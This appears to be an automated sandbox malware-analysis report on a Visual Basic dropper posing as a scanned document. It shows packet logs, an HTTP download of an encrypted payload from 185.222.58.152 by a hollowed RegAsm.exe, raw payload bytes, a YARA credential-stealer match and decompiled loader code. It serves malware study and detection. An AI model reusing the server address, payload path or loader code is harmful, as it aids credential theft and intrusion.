          Feb 22, 2021 15:18:24.109643936 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109644890 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109669924 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109669924 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109693050 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109699965 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109726906 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109729052 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109743118 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109751940 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109772921 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109776974 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109798908 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109805107 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109823942 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109829903 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109857082 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109858036 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109877110 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109884024 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109899044 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109914064 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109925032 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109941006 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109954119 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109966040 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109977007 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109991074 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110014915 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110018015 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110038996 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110047102 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110074043 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110090017 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110097885 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110126972 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110129118 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110157967 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110162020 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110182047 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110187054 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110208035 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110213041 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110234976 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110245943 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110260010 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110271931 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110286951 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110310078 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110311031 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110337973 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110344887 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110368013 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110375881 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110393047 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110405922 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110419989 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110431910 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110438108 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110465050 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110475063 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110491991 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110508919 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110510111 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110532999 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110538006 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110564947 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110588074 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110588074 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110610962 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110615969 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110640049 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110662937 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110671043 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110676050 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110687971 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110697985 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110709906 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110728025 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110733032 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110774040 CET4972680192.168.2.6185.222.58.152

          HTTP Request Dependency Graph

          • 185.222.58.152

          HTTP Packets

          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          0 | 192.168.2.6 | 49726 | 185.222.58.152 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Timestamp | kBytes transferred | Direction | Data
          Feb 22, 2021 15:18:23.821649075 CET | 1119 | OUT | GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Host: 185.222.58.152
          Cache-Control: no-cache
          Feb 22, 2021 15:18:23.871231079 CET | 1120 | IN | HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Mon, 22 Feb 2021 11:17:02 GMT
          Accept-Ranges: bytes
          ETag: "8df48f3ec9d71:0"
          Server: Microsoft-IIS/8.5
          Date: Mon, 22 Feb 2021 14:18:23 GMT
          Content-Length: 219200
          Data Raw: 16 85 f9 a9 43 ac 05 77 65 28 e1 36 60 ed a1 81 a8 24 f2 4a dd e8 88 5e 85 14 43 d8 8b 12 e1 e0 af 2f 32 f8 2b e1 8b de 9c fe 91 0b bc e0 6d 7c 04 63 57 7f 87 91 4a db 22 83 12 a6 5b cd 3c 83 6f 9c 1f 7b 95 89 34 27 6a cf eb bf ea de 22 4e 75 55 90 44 e6 00 cc 46 ca b6 61 51 77 ae cc c2 da 97 74 2b f5 f0 3c 06 71 f1 ed 7e a1 a0 d7 d8 3c 9e ba f2 9c b1 1f f6 a4 e5 5e 4e 65 83 26 ec e8 6b af 17 19 ef c1 d9 3c 6f 5a b7 62 1d 84 6e 0d 46 b1 1e ef 16 cb 97 06 f4 05 a4 23 c6 30 b3 36 1c af 61 21 62 39 29 54 e2 24 af c4 32 bb 27 7e 5e 70 4c 32 95 51 db 06 dd ed 5f 74 d4 32 c6 6f a6 dd 16 08 c5 25 dd c8 f9 04 0a 15 86 56 38 07 b3 a3 9a f5 1b b1 2e c1 9d 8f 16 64 f3 1a c8 de 84 94 6a 25 06 a1 df fc 1b 2c 09 b4 50 57 5a ee fa aa 5e d2 84 0c b2 07 e7 4b bf 22 45 3d 80 f8 10 52 6f d1 52 2d 14 42 1c 1a 81 26 5c 19 02 16 e2 8d c8 90 e0 cf 58 a0 7c c7 46 db 34 e6 f0 9a 09 3d 37 d8 bd e9 e5 8a b7 e2 6f 40 d1 9d 99 31 2e 21 56 72 5a d6 db a1 d7 71 66 31 ff de 9d ab ba 62 d9 46 5b b4 5c c3 c5 d1 76 de 7a 26 0d 91 4e 7b 98 9a f6 b6 25 3e 83 a5 5e a4 6c ed 8a 0b df 1f 81 75 24 91 7c ce 17 3b 2d f4 23 16 38 f7 cc 7d fb 33 e5 70 cb 30 d9 12 ca e8 6d 1d 08 89 53 18 0f 01 ed f9 d2 79 f2 c0 8d bb 6d c7 af 33 da a3 5a 9b fa 92 1c 6a 62 e7 bb af 31 1c 16 42 2a 1a 3c b2 fd 6f 4e 07 a3 3a 76 93 49 f7 3b d3 44 43 00 f2 46 d5 f1 7e 80 cc 22 8c d6 38 a5 f6 7b bb 43 aa a6 59 f9 64 e7 16 08 bc 18 0d e4 08 91 d2 c6 00 00 00 bd ae 40 ce 1b 19 8e b3 9e d6 43 24 71 06 85 83 a8 94 5b 9f 8c 11 45 e0 90 f3 2d 26 36 1f 4a 86 71 f4 d0 c7 ef 82 05 2f 9e ca 49 41 c6 bf 87 5a 60 f2 98 7c 8e a0 be 3a bd fb e7 ab af 56 0d ae f7 29 0d 5d 05 5c 31 86 a2 c3 f8 1b c3 0a cf f8 a5 3e a2 fc 28 c0 20 8f 0a f6 dc e5 b0 a9 5d 68 ad b6 61 6a 59 36 2b a8 fe 33 87 f9 be 8f 8c 0f f2 d7 70 52 3b 51 a8 8e e5 31 dc e4 51 c2 25 b8 7b ee 1f 69 3f cf 6f b5 4b 8d 0d 33 91 97 28 32 90 fa 98 cd 1a e6 cd 4c cb 32 ea a1 7d 6f d6 6c db 6a c0 a3 39 f8 06 c1 28 7c 88 b7 90 16 ab 89 df f1 62 3f 1c a2 85 c2 1d a8 62 d4 46 
27 06 9f 94 f6 0e 52 98 93 ec f6 3d 8f fc f0 eb 9a 1c f4 3c 96 db 7d 18 30 d3 b8 bd 0f 3b df db 3e 7a 3d ee b6 2b 7e b6 8b 67 f5 4f ba 24 be 19 37 e9 a9 97 1b f2 a3 dc 83 55 94 5b 7a 20 05 2e 7b 21 ae 2d a6 d3 6e 8c 53 1e 87 e6 c4 27 6a fe 1c c1 c0 85 9d 1d f1 37 81 60 b7 af 60 ee 99 fe c8 ac a5 18 6f 58 56 12 d7 52 db 70 58 d1 2c 15 5c cd 47 53 96 56 49 db af 23 81 d3 fa 62 fc 70 eb 17 4f b8 03 61 6f a0 ba 89 c7 2d 48 36 88 af b5 63 2c 92 32 40 4e 2f 30 a2 86 18 c7 06 25 45 32 bc a8 11 c5 6c 7b a0 e4 f7 25 13 42 0c 30 c2 e8 c8 82 c5 dc 1c d2 5b fe 00 eb 21 a7 7a 91 77 35 da 86 02 33 23 ea 8d 6c 9d 89 33 3f 90 ce c7 bd 3e 23 09 ad b3 56 90 44 e2 6f c0 46 8a bc 4b 42 47 ac cc ee da 97 74 2f f5 f0 2d 10 7a da f6 7e a6 b7 29 d9 10 9c a2 f9 9c b6 09 08 a5 c9 5c 59 ee 83 21 f4 18 75 39 1b 32 59 e3 f7 63 d3 5b fb ab 53 dd 06 64 3f bb 7d ad 7b ac cb 67 99 25 c2 42 a8 4f ca 49 17 d6 04 06 07 b2 46 58 89 52 84 80 7a fe f9 12 1d 16 3e 17 98 5b c9 dc dc c1 5d 5f d6 19 25 3d e0 f5 07 44 c4 2c f5 0a 68 37 60 3f 86 56 2b 37 b1 a3 b2 15 1b b3 29 ca 9c 95 00 6f 96 02 c8 d9 9b 6a 6b 09 04 b9 d4 52 71 39 f7 b5 5c 55 4d e5 fa ad 46 2c 85 60 b0 2c c5 60 5c 20 6f 2e 80 fc 1a 78 7c e1 50 2d 38 46 1c 1a 86 26 5c 08 14 1d 09 95 c8 97 f5 31 59 8c 7e df 4d d9 33 b0 8b 9b 25 2f 20 d3 ad ee fd 74 b6 de 6d 6b c3 b6 7a e1
          Data Ascii: Cwe(6`$J^C/2+m|cWJ"[<o{4'j"NuUDFaQwt+<q~<^Ne&k<oZbnF#06a!b9)T$2'~^pL2Q_t2o%V8.dj%,PWZ^K"E=RoR-B&\X|F4=7o@1.!VrZqf1bF[\vz&N{%>^lu$|;-#8}3p0mSym3Zjb1B*<oN:vI;DCF~"8{CYd@C$q[E-&6Jq/IAZ`|:V)]\1>( ]hajY6+3pR;Q1Q%{i?oK3(2L2}olj9(|b?bF'R=<}0;>z=+~gO$7U[z .{!-nS'j7``oXVRpX,\GSVI#bpOao-H6c,2@N/0%E2l{%B0[!zw53#l3?>#VDoFKBGt/-z~)\Y!u92Yc[Sd?}{g%BOIFXRz>[]_%=D,h7`?V+7)ojkRq9\UMF,`,`\ o.x|P-8F&\1Y~M3%/ tmkz
          Feb 22, 2021 15:18:23.871278048 CET | 1121 | IN | Data Raw: 2b 21 56 60 72 c2 db a1 dd 5b 75 01 fd de b5 f3 d7 61 d1 15 5b a5 4a c8 6e c9 76 e9 68 d8 0c bd 4c 63 93 9a f1 a0 db 3f af a7 49 af 6c ea 92 f5 7e 30 83 52 26 ba 9f cc 3f 2e 2d f4 29 3c 2b c7 ce 7d b8 33 e5 70 c2 30 d9 03 dc e3 46 26 08 8e 4a e6
          Data Ascii: +!V`r[ua[JnvhLc?Il~0R&?.-)<+}3p0F&J-yf$$vmZ;G*'vE,e,DDG{8r4SYd[;;}U^e6{p%IAC+8]w
          Feb 22, 2021 15:18:23.871300936 CET | 1123 | IN | Data Raw: 97 47 7d d8 81 12 e5 01 c6 8f 71 be cd 36 27 68 e7 cf bf 15 2b a2 41 cd 55 94 6c c3 00 cc 4c a2 f3 63 51 71 86 ea c2 da 9d 5c 0c f5 f0 36 86 66 f1 ed 7a d2 88 d7 d8 36 94 bc e6 62 b7 39 f6 a4 e3 2d 67 e5 83 2c 83 cc 74 15 13 1f 4c a7 3f 1d d7 51
          Data Ascii: G}q6'h+AUlLcQq\6fz6b9-g,tL?Q<d5g#o^]6,LARZy1W\\_p?u'@th~S)n6pET^zvL/K(aCVGR-jGd&\*$"XvH'^#&7o
          Feb 22, 2021 15:18:23.871324062 CET | 1124 | IN | Data Raw: 63 e1 c4 47 82 4d 8d 07 1b bf 95 28 34 9a d2 a0 cd 1a ec 13 4c cd 18 ea a1 7d 6e fe 6c db 68 c0 da 39 ee 89 c1 22 7c 88 b7 90 14 ab d0 df b3 f9 3f 16 a2 85 c2 1d b6 60 fc 47 8a ab 95 ac f2 0c 7a 9d 88 dc f9 17 3e 8e f6 eb 8f 16 74 2c 94 f3 30 6b
          Data Ascii: cGM(4L}nlh9"|?`Gz>t,0k79<!+g:K?([\&A4!6w#$c3&~\&WQ@X'PEYK5i}XFJ7Xb3d20<`T2{b 30Q
          Feb 22, 2021 15:18:23.917999983 CET | 1125 | IN | Data Raw: 1a 23 70 3d b9 05 ce 17 31 21 e6 21 68 2e f7 cc 79 d3 49 e5 70 c1 92 d0 08 e2 b1 6f 1d 0e 2b 5a 30 74 01 ed f3 fa 56 f2 c0 8b 65 01 ef 98 33 da a9 72 a3 fa 92 16 b4 22 99 b5 a7 31 18 0f 71 72 1d 42 a5 fd 6f 4a 27 c6 38 76 dd 61 a0 39 d3 42 2c 78
          Data Ascii: #p=1!!h.yIpo+Z0tVe3r"1qrBoJ'8va9B,xF\8H:A[bo%|?7^g^+,'{*/EiPV)r\gK>(!H]1aY6+p;S[P
          Feb 22, 2021 15:18:23.918077946 CET | 1127 | IN | Data Raw: c5 04 a1 a0 dd 7a 2d 9b a0 da fa b3 1f f0 06 f4 5b 66 9e 83 26 e6 ce 13 17 19 1f 73 e0 14 1d d1 5c d3 3a 3c d0 0c 4c 5d 93 6e 9b 51 d0 e5 67 93 0d e9 42 a8 58 db 6a 05 cd 04 0b 0b c1 52 74 8b 4b 9c 85 6c ed 11 3b 54 16 29 1a 3a 4d d4 35 a3 fa 5f
          Data Ascii: z-[f&s\:<L]nQgBXjRtKl;T):M5_t=>&w7j$G=>od3z/F_\0"MTGR-@4r&Z1~"^FJu4wo@!VhrvNa4,\Oa"%L{%8^
          Feb 22, 2021 15:18:23.918142080 CET | 1128 | IN | Data Raw: 1c a2 84 ea 86 b6 60 f6 6f 55 04 95 b8 c0 97 7a 9c 99 fb d4 37 29 8f f0 c3 01 16 74 37 89 d1 f5 34 37 d3 b9 9f 14 39 df d1 12 7a 37 ee b0 09 65 b5 8b 6d e9 14 93 24 be 15 9f 76 a9 97 15 c7 a9 50 cf 65 96 5a 7e bb 05 2e 70 09 32 3c b0 d2 6f 84 63
          Data Ascii: `oUz7)t7479z7em$vPeZ~.p2<ocJhh75|ITUVb=dnIW#k8}FGE#5, i2$x-mlq'n09@/P2({'D!"NUJFzauk+
          Feb 22, 2021 15:18:23.918204069 CET | 1130 | IN | Data Raw: 5a 8a f1 8a e2 6b 6e ee c8 12 31 1c 1c 49 33 09 37 b2 ec 64 52 f1 82 16 4c dc 5d df bf d1 44 45 17 7f 41 d5 f1 51 e7 ae 4b ff c0 31 8d 53 36 b8 49 08 97 5e ea 6c b8 1d 1c a8 0d 80 cb 08 91 d3 d5 09 11 09 ab b9 dc df 12 2e a6 14 fe f8 3b 71 1e 76
          Data Ascii: Zkn1I37dRL]DEAQK1S6I^l.;qvAr6<XJy[:V-].3'\"<]h{yR6:]`kA0S7ZR{CZ37"n16Wo\j9"(m
          Feb 22, 2021 15:18:23.918262005 CET | 1131 | IN | Data Raw: c7 53 a0 76 23 42 3c cb 6b c7 10 4c 4d aa 84 6f a7 b7 7d e8 0d 00 20 3c 11 1c 98 56 0f 22 cc e5 77 b5 d4 32 c0 50 25 dd 16 4e 1a 29 f8 30 5f 37 6a 1f 95 44 10 3f b3 a3 90 cb 1b a2 27 e2 56 84 16 62 c9 17 c8 de 97 fb ac 25 06 ab 01 5d 53 07 3e b4
          Data Ascii: Sv#B<kLMo} <V"w2P%N)0_7jD?'Vb%]S>p]I^cp"G;:Re]<q5H1:"p`|@u"Gx.0^Jf1VQJ}v&f>In|-+>{p7mK07yjm
          Feb 22, 2021 15:18:23.918320894 CET | 1132 | IN | Data Raw: 81 4f 99 3e b3 22 96 6f b7 ed a3 bf 31 d8 a3 da 4d e8 96 5b 56 08 32 2e 7a 2b ba 2f b7 f0 7d 97 53 13 4e 66 bb 05 68 e6 13 d8 f4 e5 4b 8b dd 35 9c 43 9f a8 78 16 89 d5 a5 57 a7 33 86 0e 73 12 d7 5c db e2 58 d1 2c 41 58 fd 45 57 92 13 4b db ab 0b
          Data Ascii: O>"o1M[V2.z+/}SNfhK5CxW3s\X,AXEWKoRnXOm;$@w*gy2Bz'CD:n6m@Ve*<"' 7`}Fg@r\6.x69N7M4(<,dtm{
          Feb 22, 2021 15:18:23.918366909 CET | 1134 | IN | Data Raw: aa 80 71 85 64 a9 1f 67 5c 1a 0d ee 19 98 c3 c1 73 e1 00 bd a4 53 c8 0a 3f e1 51 fe f8 3b 55 2b 3d 87 83 ae 8c 27 9f 8c 1b d6 e8 82 f8 55 30 36 1f 1e ad 0b f4 d0 cd c7 e4 07 2f 98 e2 35 41 c6 f5 e8 b9 20 dc e0 08 e6 a0 39 3a bd fd f6 ad c0 b3 ad
          Data Ascii: qdg\sS?Q;U+='U06/5A 9:8u+^g%!)!(*LWlH`|7.`pX?Q](hbAoIw3RfF{1l`F9`xIU>CG-z#hb=Q7;u5


          Code Manipulations

          Statistics

          CPU Usage


          Memory Usage


          High Level Behavior Distribution


          Behavior


          System Behavior

          General

          Start time:15:17:58
          Start date:22/02/2021
          Path:C:\Users\user\Desktop\SKM_C3350191107102300.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Imagebase:0x400000
          File size:61440 bytes
          MD5 hash:58BB0368BC9CF6EC86C266F54CDEFEEB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Visual Basic
          Reputation:low

          General

          Start time:15:18:09
          Start date:22/02/2021
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Imagebase:0xe60000
          File size:64616 bytes
          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp, Author: Joe Security
          Reputation:high

          General

          Start time:15:18:09
          Start date:22/02/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff61de10000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Disassembly

          Code Analysis

            Executed Functions

            C-Code - Quality: 60%
            			E0040A804(void* __ebx, void* __edi, void* __esi, signed int _a4) {
            				signed int _v8;
            				intOrPtr _v12;
            				char** _v16;
            				intOrPtr _v28;
            				signed int _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				char _v44;
            				signed int _v48;
            				signed int _v52;
            				char _v56;
            				signed int* _v60;
            				signed int _v64;
            				void* _v76;
            				long long _v84;
            				char* _v88;
            				signed int _v92;
            				char _v96;
            				signed int _v100;
            				char _v104;
            				intOrPtr _v112;
            				char _v120;
            				char _v136;
            				char _v156;
            				char* _v164;
            				char _v172;
            				intOrPtr _v180;
            				char _v188;
            				char _v192;
            				void* _v196;
            				char* _v200;
            				char _v204;
            				char _v208;
            				char _v212;
            				char _v216;
            				char _v220;
            				intOrPtr _v224;
            				char _v228;
            				intOrPtr _v232;
            				char _v236;
            				signed int _v240;
            				signed int _v244;
            				signed int _v248;
            				signed int _v252;
            				intOrPtr* _v256;
            				signed int _v260;
            				signed int _v264;
            				intOrPtr _v268;
            				intOrPtr _v272;
            				signed int _v284;
            				signed int _v288;
            				signed int _v292;
            				void* _v296;
            				intOrPtr* _v300;
            				signed int _v304;
            				signed int* _v308;
            				signed int _v312;
            				intOrPtr* _v316;
            				signed int _v320;
            				intOrPtr* _v324;
            				signed int _v328;
            				intOrPtr* _v332;
            				signed int _v336;
            				intOrPtr* _v340;
            				signed int _v344;
            				signed int _v348;
            				intOrPtr* _v352;
            				signed int _v356;
            				intOrPtr* _v360;
            				signed int _v364;
            				intOrPtr* _v368;
            				signed int _v372;
            				signed int _v376;
            				intOrPtr* _v380;
            				signed int _v384;
            				intOrPtr* _v388;
            				signed int _v392;
            				intOrPtr* _v396;
            				signed int _v400;
            				signed int _v404;
            				intOrPtr* _v408;
            				signed int _v412;
            				signed int _v416;
            				signed int _v420;
            				void* _v440;
            				intOrPtr _v456;
            				char** _v460;
            				void* _v472;
            				signed int _t485;
            				signed int _t492;
            				signed int _t496;
            				signed int _t508;
            				signed int _t512;
            				signed int _t516;
            				signed int _t520;
            				signed int _t533;
            				signed int _t537;
            				signed int _t549;
            				signed int _t554;
            				signed int _t558;
            				signed int _t562;
            				signed int _t566;
            				signed int _t578;
            				signed int _t582;
            				signed int _t590;
            				char* _t593;
            				signed int _t597;
            				signed int _t601;
            				signed int _t605;
            				signed int _t609;
            				char* _t613;
            				signed int _t617;
            				signed int _t627;
            				signed int _t634;
            				signed int _t638;
            				signed int _t643;
            				signed int _t649;
            				signed int _t653;
            				signed int _t655;
            				signed int _t657;
            				char* _t658;
            				signed int _t664;
            				signed int _t668;
            				signed int _t678;
            				void* _t685;
            				intOrPtr _t697;
            				intOrPtr _t713;
            				intOrPtr _t726;
            				intOrPtr _t730;
            				char* _t731;
            				char** _t745;
            				char* _t750;
            				void* _t753;
            				void* _t754;
            				void* _t756;
            				char** _t757;
            				char** _t758;
            				char** _t759;
            				char** _t760;
            
            				_t685 = __ebx;
            				_t754 = _t756;
            				_t757 = _t756 - 0xc;
            				 *[fs:0x0] = _t757;
            				L00401190();
            				_v16 = _t757;
            				_v12 = 0x4010f8;
            				_v8 = _a4 & 0x00000001;
            				_a4 = _a4 & 0xfffffffe;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401196, _t753);
            				_v164 = L"19:19:19";
            				_v172 = 8;
            				L00401298();
            				_push( &_v120);
            				_push( &_v136); // executed
            				L0040129E(); // executed
            				_v180 = 0x13;
            				_v188 = 0x8002;
            				_push( &_v136);
            				_t485 =  &_v188;
            				_push(_t485);
            				L004012A4();
            				_v240 = _t485;
            				_push( &_v136);
            				_push( &_v120);
            				_push(2);
            				L00401292();
            				_t758 =  &(_t757[3]);
            				if(_v240 != 0) {
            					if( *0x40d010 != 0) {
            						_v300 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v300 = 0x40d010;
            					}
            					_t664 =  &_v96;
            					L0040128C();
            					_v240 = _t664;
            					_t668 =  *((intOrPtr*)( *_v240 + 0x108))(_v240,  &_v92, _t664,  *((intOrPtr*)( *((intOrPtr*)( *_v300)) + 0x314))( *_v300));
            					asm("fclex");
            					_v244 = _t668;
            					if(_v244 >= 0) {
            						_t40 =  &_v304;
            						 *_t40 = _v304 & 0x00000000;
            						__eflags =  *_t40;
            					} else {
            						_push(0x108);
            						_push(0x401cd4);
            						_push(_v240);
            						_push(_v244);
            						L00401280();
            						_v304 = _t668;
            					}
            					if( *0x40d33c != 0) {
            						_v308 = 0x40d33c;
            					} else {
            						_push(0x40d33c);
            						_push(0x401d04);
            						L00401286();
            						_v308 = 0x40d33c;
            					}
            					_v248 =  *_v308;
            					_v284 = _v92;
            					_v92 = _v92 & 0x00000000;
            					_v112 = _v284;
            					_v120 = 8;
            					_v164 = 0xe3;
            					_v172 = 2;
            					L00401190();
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					L00401190();
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					_t678 =  *((intOrPtr*)( *_v248 + 0x38))(_v248, 0x10, 0x10,  &_v136);
            					asm("fclex");
            					_v252 = _t678;
            					if(_v252 >= 0) {
            						_t66 =  &_v312;
            						 *_t66 = _v312 & 0x00000000;
            						__eflags =  *_t66;
            					} else {
            						_push(0x38);
            						_push(0x401cf4);
            						_push(_v248);
            						_push(_v252);
            						L00401280();
            						_v312 = _t678;
            					}
            					_push( &_v136);
            					_push( &_v156);
            					L00401274();
            					_push( &_v156);
            					_push( &_v56);
            					L0040127A();
            					L0040126E();
            					_push( &_v136);
            					_push( &_v120);
            					_push(2);
            					L00401292();
            					_t758 =  &(_t758[3]);
            				}
            				if( *0x40d010 != 0) {
            					_v316 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v316 = 0x40d010;
            				}
            				_t492 =  &_v96;
            				L0040128C();
            				_v240 = _t492;
            				_t496 =  *((intOrPtr*)( *_v240 + 0x158))(_v240,  &_v92, _t492,  *((intOrPtr*)( *((intOrPtr*)( *_v316)) + 0x300))( *_v316));
            				asm("fclex");
            				_v244 = _t496;
            				if(_v244 >= 0) {
            					_t91 =  &_v320;
            					 *_t91 = _v320 & 0x00000000;
            					__eflags =  *_t91;
            				} else {
            					_push(0x158);
            					_push(0x401d14);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v320 = _t496;
            				}
            				_v192 = 0x633;
            				_v200 = 0x1e68d1;
            				 *((intOrPtr*)( *_a4 + 0x70c))(_a4, _v92,  &_v200,  &_v192,  &_v220);
            				_v48 = _v220;
            				_v44 = _v216;
            				L00401268();
            				L0040126E();
            				if( *0x40d010 != 0) {
            					_v324 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v324 = 0x40d010;
            				}
            				_t508 =  &_v96;
            				L0040128C();
            				_v240 = _t508;
            				_t512 =  *((intOrPtr*)( *_v240 + 0xf8))(_v240,  &_v100, _t508,  *((intOrPtr*)( *((intOrPtr*)( *_v324)) + 0x300))( *_v324));
            				asm("fclex");
            				_v244 = _t512;
            				if(_v244 >= 0) {
            					_t124 =  &_v328;
            					 *_t124 = _v328 & 0x00000000;
            					__eflags =  *_t124;
            				} else {
            					_push(0xf8);
            					_push(0x401d14);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v328 = _t512;
            				}
            				if( *0x40d010 != 0) {
            					_v332 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v332 = 0x40d010;
            				}
            				_t697 =  *((intOrPtr*)( *_v332));
            				_t516 =  &_v104;
            				L0040128C();
            				_v248 = _t516;
